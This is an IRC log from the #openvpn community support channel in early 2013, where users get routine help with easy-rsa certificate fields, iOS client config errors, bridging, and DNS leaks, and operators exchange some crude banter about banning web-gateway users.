23:13 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 264 seconds]
23:30 -!- madsage [sage@2001:470:c:1292::2] has quit [Quit: My damn controlling terminal disappeared!]
23:59 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 246 seconds]
--- Day changed Thu Jan 31 2013
00:03 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 246 seconds]
00:12 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
00:21 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds]
00:25 -!- adolfomaltez [~taro@190.62.233.158] has quit [Ping timeout: 248 seconds]
00:26 -!- adolfomaltez [~taro@190.62.225.178] has joined #openvpn
00:34 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn
00:34 -!- mode/#openvpn [+o dazo_afk] by ChanServ
00:34 -!- dazo_afk is now known as dazo
00:34 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
01:02 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn
01:20 -!- dazo [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds]
01:21 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
01:21 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer]
01:21 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
01:24 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
01:30 -!- master_of_master [~master_of@p57B54CF7.dip.t-dialin.net] has quit [Ping timeout: 276 seconds]
01:31 -!- master_of_master [~master_of@p57B54946.dip.t-dialin.net] has joined #openvpn
01:33 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds]
01:34 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn
01:34 -!- mode/#openvpn [+o dazo_afk] by ChanServ
01:34 -!- dazo_afk is now known as dazo
01:36 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
01:44 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 246 seconds]
01:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:03 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
02:07 -!- greyEAX [~marmalade@cpe-76-171-192-216.socal.res.rr.com] has quit [Read error: Connection reset by peer]
02:08 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has joined #openvpn
02:09 < flufmnstr> heyo yall. im trying to find some info on the KEY_CN, KEY_NAME, and KEY_OU options in the config, but im coming up with nothing. anyone know where i can find a doc on them?
02:11 <+pekster> flufmnstr: They're just the X509 field options defined as variables that are used by the openssl.cnf config files
02:12 <+pekster> flufmnstr: ie: the KEY_CN is the CN (commonName) X509 field, the KEY_OU is the OU (organizationalUnit) field, etc. Maybe you want docs on openssl or X509 instead? None of that is openvpn specific, except perhaps the shipped easy-rsa scripts
02:13 < flufmnstr> ah ok. ill check those out. thanks mate.
02:14 <+pekster> Just declare sensible values in your config for your use. For all it matters, define that your Org is "Earthling" and your city is "North Pole" ;)
02:17 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
02:26 <+pekster> I understand about 2 sentences out of this entire article: https://en.wikipedia.org/wiki/Quantum_gate
02:26 <@vpnHelper> Title: Quantum gate - Wikipedia, the free encyclopedia (at en.wikipedia.org)
02:27 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
02:29 < flufmnstr> oh wow. it lost me at phase shift gates
02:29 <+pekster> Oh, that was for another channel, but I'm glad someone found entertainment in it :P
02:30 < flufmnstr> im quite an amateur nerd. though my interests mainly lay in particle physics and chemistry
02:31 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
02:31 < flufmnstr> it's good to see quantum computing coming along
02:31 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer]
02:32 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn
02:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
02:36 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:37 <+pekster> When I eventually retire, I should find the time to spend a few years taking courses to learn the math behind some of this quantum science stuff. Understanding Schrödinger's cat doesn't really help in stuff like that
02:53 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
03:03 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds]
03:05 -!- [fred] [fred@konfuzi.us] has joined #openvpn
03:09 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has joined #openvpn
03:19 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn
03:25 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection]
03:35 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
03:39 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has quit [Quit: Computer has gone to sleep.]
03:53 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
03:57 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn
03:59 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Remote host closed the connection]
03:59 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn
03:59 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Read error: Connection reset by peer]
04:00 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn
04:03 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
04:09 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
04:09 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
04:11 -!- zz_AsadH is now known as AsadH
04:21 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
04:25 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 248 seconds]
04:34 -!- adolfomaltez1 [~taro@190.62.239.151] has joined #openvpn
04:35 -!- adolfomaltez [~taro@190.62.225.178] has quit [Ping timeout: 248 seconds]
04:41 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Quit: Changing server]
04:47 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
04:47 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn
05:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
05:30 -!- Spooked [~SpookZA@dsl-146-42-248.telkomadsl.co.za] has joined #openvpn
05:30 -!- SpookZA [~SpookZA@197.87.53.234] has quit [Disconnected by services]
05:30 -!- Spooked is now known as SpookZA
05:36 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer]
05:38 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
05:39 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
05:41 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds]
05:41 -!- [1]c3vin is now known as c3vin
05:44 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn
05:44 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Read error: Connection reset by peer]
06:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
06:03 < hg_5> hello, when im trying to build key for client1 i receive this: http://puu.sh/1Vj7p , what can be wrong, i have used winxp and win7 and same problem
06:06 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has quit [Ping timeout: 256 seconds]
06:09 -!- fALSO [~falso@deadbsd.org] has joined #openvpn
06:09 < fALSO> Hi!
06:11 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has quit [Ping timeout: 240 seconds]
06:11 < fALSO> anyone willing to help me out
06:11 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
06:11 < fALSO> im not being able to establish a connection from a client to an openvpn server
06:11 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has joined #openvpn
06:12 < fALSO> http://pastebin.com/XXcK80En
06:12 < fALSO> i keep getting this :
06:12 < fALSO> Connection reset, restarting [-1]
06:12 < fALSO> SIGUSR1[soft,connection-reset] received, client-instance restarting
06:12 < fALSO> MULTI: multi_close_instance called
06:13 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds]
06:13 -!- [1]c3vin is now known as c3vin
06:13 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn
06:13 -!- adolfomaltez [~taro@190.62.232.27] has joined #openvpn
06:13 -!- adolfomaltez1 [~taro@190.62.239.151] has quit [Ping timeout: 248 seconds]
06:15 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: Leaving]
06:18 -!- adolfomaltez1 [~taro@190.62.244.180] has joined #openvpn
06:18 -!- adolfomaltez [~taro@190.62.232.27] has quit [Ping timeout: 248 seconds]
06:20 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has quit [Ping timeout: 256 seconds]
06:24 -!- adolfomaltez1 [~taro@190.62.244.180] has quit [Ping timeout: 248 seconds]
06:25 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has joined #openvpn
06:25 -!- adolfomaltez [~taro@190.62.217.193] has joined #openvpn
06:27 < fALSO> anyone knows what may cause that ?
06:28 -!- ade_b [~Ade@129.178.182.25] has joined #openvpn
06:28 -!- ade_b [~Ade@129.178.182.25] has quit [Changing host]
06:28 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
06:28 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn
06:43 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn
06:43 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has quit [Ping timeout: 244 seconds]
06:45 < spitf1r3> Hi. Can somebody help me with OpenVPN connect for iOS?
06:45 < spitf1r3> I have a configuration for certificate-only authentication
06:46 < spitf1r3> I've imported cert on iOS, and selected that certificate for my configuration.
06:46 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 264 seconds]
06:47 < spitf1r3> but all I get is: "VPN-On-Demand configuration error: CertificateRef undefined"
06:47 < spitf1r3> But log window is empty
06:52 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 245 seconds]
06:53 -!- fALSO [~falso@deadbsd.org] has left #openvpn []
06:57 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 256 seconds]
07:00 -!- master_of_master [~master_of@p57B54946.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
07:01 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Quit: Computer has gone to sleep.]
07:01 -!- master_of_master [~master_of@p57B55CF7.dip.t-dialin.net] has joined #openvpn
07:05 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
07:05 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 240 seconds]
07:08 < spitf1r3> I've tested same config on my Mac, and it worked
07:09 < spitf1r3> same happened, when I've tried using a "unified" configuration file
07:09 < spitf1r3> and that one worked on my mac too
07:10 -!- niervol [~krystian@193.106.244.150] has quit [Remote host closed the connection]
07:11 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
07:25 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 244 seconds]
07:26 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
07:28 -!- Porkepix [~Porkepix@157.138.189.81] has joined #openvpn
07:29 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:29 -!- Porkepix [~Porkepix@157.138.189.81] has quit [Client Quit]
07:34 -!- u0m3 [~Radu@109.96.171.40] has joined #openvpn
07:40 -!- adolfomaltez [~taro@190.62.217.193] has quit [Remote host closed the connection]
07:45 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Read error: Connection reset by peer]
07:47 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
07:52 -!- mattockl [~mattock@raidz.im] has joined #openvpn
07:53 -!- mattockl is now known as mattock
07:53 -!- mattock [~mattock@raidz.im] has quit [Changing host]
07:53 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn
07:53 -!- mode/#openvpn [+o mattock] by ChanServ
07:54 < spitf1r3> Now I get something in logs;
07:54 < spitf1r3> 2013-01-31 14:30:01 EVENT: CONFIG_FILE_PARSE_ERROR option_error: remote option not specified [ERR]
07:54 < spitf1r3> 2013-01-31 14:30:01 EVENT: DISCONNECT_PENDING
07:54 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
07:54 -!- [2]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
07:54 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds]
07:54 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 240 seconds]
07:54 -!- [2]c3vin is now known as c3vin
07:54 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds]
07:54 < spitf1r3> though I obviously have remote in my .ovpn config
07:56 < jY> pastebin your config
07:56 < sam1> is there any reason from a security perspective to route all client traffic through the vpn? In perspective of the remote office. Not that you are sitting as a road warrior etc.
07:57 < sam1> hm, poorly formulated question.
08:00 < rob0> sam1, consult the sales information for Cisco VPNs. They and other commercial VPN offerings will argue the point that yes, you want to route all client traffic while that client is connected.
08:01 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Ping timeout: 256 seconds]
08:01 < rob0> It reduces the chances of loss of sensitive data, but intelligent users are a much more effective defense against that.
08:02 < rob0> Would be nice if there was such a thing as intelligent users. :)
08:02 < spitf1r3> jY: http://pastie.org/5986518
08:05 < rob0> "remote 192.168.100.1 1194", you're connecting via LAN or wireless to this server?
08:05 < rob0> !goal
08:05 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
08:05 < spitf1r3> rob0: just to test it
08:05 < spitf1r3> same conf works from my macbook
08:06 < spitf1r3> and the "unified" version; http://pastie.org/5986529
08:06 < rob0> you have a route to this 192.168.100.1 address?
08:06 -!- u0m3 [~Radu@109.96.171.40] has quit [Read error: Connection reset by peer]
08:06 < sam1> hmz
08:06 < sam1> openvpn.net seems down.
08:06 < spitf1r3> yes
08:07 < spitf1r3> rob0: yes, I do
08:07 < spitf1r3> it is a 'guest' subnet
08:07 < spitf1r3> and I've connected to it for testing
08:07 < spitf1r3> but why "CONFIG_FILE_PARSE_ERROR option_error: remote option not specified [ERR]", when I DO have remote defined?
08:09 -!- u0m3 [~Radu@92.80.113.44] has joined #openvpn
08:10 < rob0> no idea, but did you try starting it with --remote on the command line?
08:10 < spitf1r3> same when I try to connect from outside, using address reachable from outside
08:10 < spitf1r3> rob0: commandline? on iOS?
08:11 < rob0> I don't have iOS and cannot relate to what you might be trying to say.
08:11 < spitf1r3> Ok
08:12 < spitf1r3> I can try to find the binary, as I am jailbroken
08:12 -!- m0rph [~m0rph@host81-149-146-80.in-addr.btopenworld.com] has joined #openvpn
08:12 < spitf1r3> No I can't
08:12 * rob0 just had an idea, a long shot
08:12 < spitf1r3> But why am I getting such a message?
08:13 < spitf1r3> CONFIG_FILE_PARSE_ERROR option_error: remote option not specified [ERR]
08:13 < spitf1r3> doesn't make any sense
08:13 < rob0> ensure that the file has Unix line ends
08:13 < spitf1r3> It was edited on a Mac, it should have
08:13 < rob0> if necessary, recreate it in a Unix editor
08:13 < spitf1r3> how do I check that?
08:14 < spitf1r3> if it has correct line endings?
08:14 < rob0> maybe a question for the Mac folks?
08:14 < spitf1r3> I have a command line on mac
08:14 < spitf1r3> any normal unix/linux command to check that?
08:16 < MorgyN> file probably will
08:16 < spitf1r3> file Documents/openwrt01.ovpn
08:16 < spitf1r3> Documents/openwrt01.ovpn: ASCII text
08:16 < spitf1r3> Doesn't say that
08:16 < spitf1r3> but the file was created on mac, which is unix
08:16 < spitf1r3> I can recreate it in, say, nano
08:17 < MorgyN> it says dos if it has \r's i believe
08:17 < spitf1r3> that should do, right?
08:17 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
08:17 < spitf1r3> nano opens it just fine
08:17 < spitf1r3> so It's good
08:17 -!- syoma [~syoma@186.34.232.222] has quit [Quit: leaving]
08:17 < MorgyN> ASCII text, with CRLF line terminators
08:18 < MorgyN> is what it returns for dos ones
08:18 < rob0> nano gives you the choice of line ends, when saving
08:18 < spitf1r3> okay, my files are fine, then what is wrong?
08:18 < spitf1r3> Anybody here used OVPN Connect for iOS?
08:20 < rob0> My nano in Linux offers Alt-D for DOS and Alt-M for Mac lines.
08:20 < rob0> so maybe in Mac it defaults to Mac lines?
08:20 < m0rph> is this the chan for openvpn.net?
08:21 < spitf1r3> doesn't work with either p12 from the system, ovpn with accompanying key ca and cert, nor with "unified" files that embed keys
08:21 < rob0> m0rph, as per /topic this is the OpenVPN Community Support Channel
08:22 < m0rph> Well i kinda guessed this was but wasn't certain. You know why the site is down? Trying to get the windows client
08:23 < rob0> mattock, ^^ ping?
08:25 < m0rph> can ping it, the site just appears unresponsive
08:26 < spitf1r3> https://dl.dropbox.com/u/121402/openwrt01.test.ovpn
08:27 < spitf1r3> That one has the same issue.
08:27 -!- u0m3 [~Radu@92.80.113.44] has quit [Read error: Connection reset by peer]
08:29 < spitf1r3> I had 504 Gateway Time-out on openvpn.net
08:30 < spitf1r3> And regarding my problem: I have the same issue as here as well, but I'm NOT setting up a VPN on demand entry: https://forums.openvpn.net/topic12019.html
08:30 <@vpnHelper> Title: OpenVPN Support Forum VPN-On-Demand configuration error: CertificateRef undefined : OpenVPN Connect (iOS) (at forums.openvpn.net)
08:31 -!- u0m3 [~Radu@109.96.129.81] has joined #openvpn
08:31 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
08:32 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
08:32 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds]
08:32 -!- [1]c3vin is now known as c3vin
08:36 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
08:37 < jackbrown> hi there
08:37 < jackbrown> if i set a proxy into the Linux OPENVPN mask = my machine -->proxy---->VPN ?? correct ?
08:56 -!- scoates [~sean@iconoclast.caedmon.net] has joined #openvpn
08:57 < scoates> Is this the right place to talk about the iOS app? or is that better elsewhere?
08:58 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 255 seconds]
08:58 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 246 seconds]
08:59 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
08:59 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn
09:00 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
09:02 -!- [1]c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
09:02 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Ping timeout: 240 seconds]
09:02 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 240 seconds]
09:02 -!- [1]c3vin is now known as c3vin
09:02 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has joined #openvpn
09:16 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Quit: ZNC - http://znc.in]
09:17 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn
09:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
09:18 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.]
09:24 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Quit: leaving]
09:24 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via]
09:26 -!- m0rph [~m0rph@host81-149-146-80.in-addr.btopenworld.com] has quit [Quit: Leaving]
09:28 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 255 seconds]
09:31 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds]
09:31 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
09:32 < hg_5> hello i have just bought recently intel ssd G2 80gb, and i was trying to install windows 7 home edition on core2duo PC, and i can't get past this progress, i have waited more than 30 minutes and nothing happened http://puu.sh/1VmnP
09:32 < hg_5> sorry wrong room..
09:35 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection]
09:39 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
09:41 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
09:44 -!- Porkepix [~Porkepix@157.138.189.81] has joined #openvpn
09:53 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
09:59 -!- Porkepix [~Porkepix@157.138.189.81] has quit [Quit: Computer has gone to sleep.]
10:01 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
10:07 -!- Devastator- [~devas@177.99.152.118] has joined #openvpn
10:08 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 245 seconds]
10:11 -!- Dashers [dash@home.aligrant.com] has joined #openvpn
10:12 < Dashers> Hi all. I am having trouble getting tap working. I've got a Linux server and a Windows client. I have got to the point that the windows client connects and obtains an IP address from a DHCP server *behind* the server. I can ping the server from the client, but not the other way around, nor can I ping any other address behind the network; despite the pings getting to the destination fine, the reply never makes it back.
10:12 < Dashers> Any idea?
10:13 < Dashers> There are no firewalls running
10:15 < Dashers> I guess it's something to do with the bridge
10:19 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:29 <@dazo> Dashers: why do you bridge?
10:30 -!- oyunokata [~rrinehart@209.163.177.130] has joined #openvpn
10:31 < oyunokata> !wecolme
10:31 < Dashers> Because that's the only option available in this situation. I've only ever done routed before.
10:32 < Dashers> I guess I'm missing something at the networking layer of the server. Just not sure what.
10:32 < Dashers> I've created a bridge, and everything seems connected up ok. Indeed I can ping client->server, just not the other way.
10:33 < Dashers> Monitoring the network I can pick up pings coming from the client, and see responses, they just never make it.
10:39 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:46 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Remote host closed the connection]
10:48 < Dashers> Well, I've identified that the ping replies don't make it back to the server either. But I've run out of time for today.
10:48 < Dashers> Guess it's something to do with that eerie world of ARP
10:48 -!- raidz_away is now known as raidz
10:52 -!- Dashers [dash@home.aligrant.com] has quit [Quit: fnar]
11:30 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn
11:33 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
11:35 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 252 seconds]
11:37 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Quit: Leaving]
11:38 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
11:53 -!- Devastator- [~devas@177.99.152.118] has quit [Changing host]
11:53 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
11:53 -!- Devastator- is now known as Devastator
11:55 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn
11:55 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn
12:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
12:08 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 264 seconds]
12:22 -!- Devastator- [~devas@177.99.152.118] has joined #openvpn
12:22 -!- Devastator- [~devas@177.99.152.118] has quit [Changing host]
12:22 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
12:22 -!- AsadH is now known as zz_AsadH
12:25 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 276 seconds]
12:25 -!- Devastator- is now known as Devastator
12:30 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
12:30 -!- mode/#openvpn [+o krzee] by ChanServ
12:33 -!- mode/#openvpn [+v pekster] by ChanServ
12:34 -!- exed [~maximus@host-88-217-184-122.customer.m-online.net] has quit [Ping timeout: 245 seconds]
12:34 -!- dazo is now known as dazo_afk
12:44 -!- u0m3_ [~Radu@92.80.84.80] has joined #openvpn
12:47 -!- u0m3 [~Radu@109.96.129.81] has quit [Ping timeout: 276 seconds]
12:49 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has joined #openvpn
12:56 <+pekster> Have we traditionally had issues with web gateway users? They're apparently banned, and I'd hate to undo that if there's a good reason for it
13:00 < EugeneKay> I don't recall any specific incidents in this channel; likely because of the long-standing ban.
13:01 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has quit [Ping timeout: 244 seconds]
13:01 <@ecrist> yes
13:01 <@ecrist> web users tend to be either spammers, or stupid
13:01 < EugeneKay> I have seen issues recently in other large channels with them. Too lazy to get a real IRC client equates to too lazy to google the fucking problem.
13:02 <+pekster> Ah, okay. I guess I spend more time on other channels that get semi-decent web users then. I must pick channels that aren't worthwhile to spam :P
13:02 < EugeneKay> #git allows them to /join (quiet-ban), but they have to be able to read the topic and figure out to /msg the bot for voice.
13:02 < EugeneKay> This is more challenging than you might think
13:03 <@ecrist> heh
13:03 <@ecrist> the unreal ircd channel requires users to join, the bot sends new users a link, via PM, to a quiz. only after they pass the quiz are they allowed to talk
13:03 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn
13:05 <+pekster> There was a nifty new captcha style someone came up with that leveraged empathy in the reply, so until we teach bots to feel, I liked the idea there
13:05 <@krzee> they often don't understand ANYTHING about networking
13:05 <+pekster> Regardless, our topic can't really spare the space to change the +b to +q, so I'm happy leaving it. Just curious
13:06 <@krzee> "hey guise, wanna setup my vpn for me?"
13:06 -!- mndo [~mndo@bl17-71-84.dsl.telepac.pt] has quit [Ping timeout: 264 seconds]
13:06 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
13:07 <@ecrist> and, as soon as someone says no, the inevitable "go fuck yourself! I thought you were supposed to help! your program will never be popular with your attitudz fag!"
13:07 <@krzee> lolyes
13:07 <@ecrist> /ragequit
13:13 < jackbrown> If I'm using a VPN with a cert (the provider gave me), can my actual Internet provider see which http pages I visit, or just the VPN provider?
13:14 < EugeneKay> I presume you're doing redirection, in which case your ISP would see only the encapsulated VPN traffic
13:14 <@ecrist> it depends
13:14 <@ecrist> possibly the DNS query, if that's not routed properly
13:14 < EugeneKay> Plus any leaks (DNS being the most common)
13:19 < jackbrown> EugeneKay: how can I check DNS LEAKS?
13:19 <+pekster> I suspect the "DNS leaks" problem is mostly people using their LAN gw's forwarding resolver and having the implicit route allow that
13:20 < jackbrown> pekster: ?
13:21 < rob0> jackbrown, there are no "DNS leaks" if your DNS queries are routed through the tunnel. The easiest way is to use 8.8.4.4 in place of your ISP nameserver[s].
13:21 < jackbrown> rob0: what does that mean? The easiest way is to use 8.8.4.4 in place of your ISP nameserver
13:21 < jackbrown> rob0: I use www.dnsleakstest.com
13:22 < jackbrown> http://www.dnsleaktest.com/
13:22 <@vpnHelper> Title: DNS leak test (at www.dnsleaktest.com)
13:23 < jackbrown> rob0: is this website enough?
13:24 <+pekster> Not really, if you aren't going to take the time to understand the concepts behind the problem. Use of multiple DNS servers leads to intermittent access to each depending on factors out of your control
13:25 < jackbrown> pekster: where can I understand the problem?
13:25 < jackbrown> pekster: I'm using Linux Mint and OpenVPN
13:26 <+pekster> By reading the information we've posted. If you define your ISP's resolvers anywhere in your setup, you may end up sending requests to them. If you define a LAN resolver (eg: on your router) that device will send requests where it's configured to, and it doesn't have your VPN
13:27 <+pekster> So, your solution is to remove all references, explicit or implied by using other LAN equipment, from your DNS resolver setup (usually /etc/resolv.conf under Linux, although follow your distro's information for doing this)
13:29 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
13:30 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn
13:53 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds]
13:54 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds]
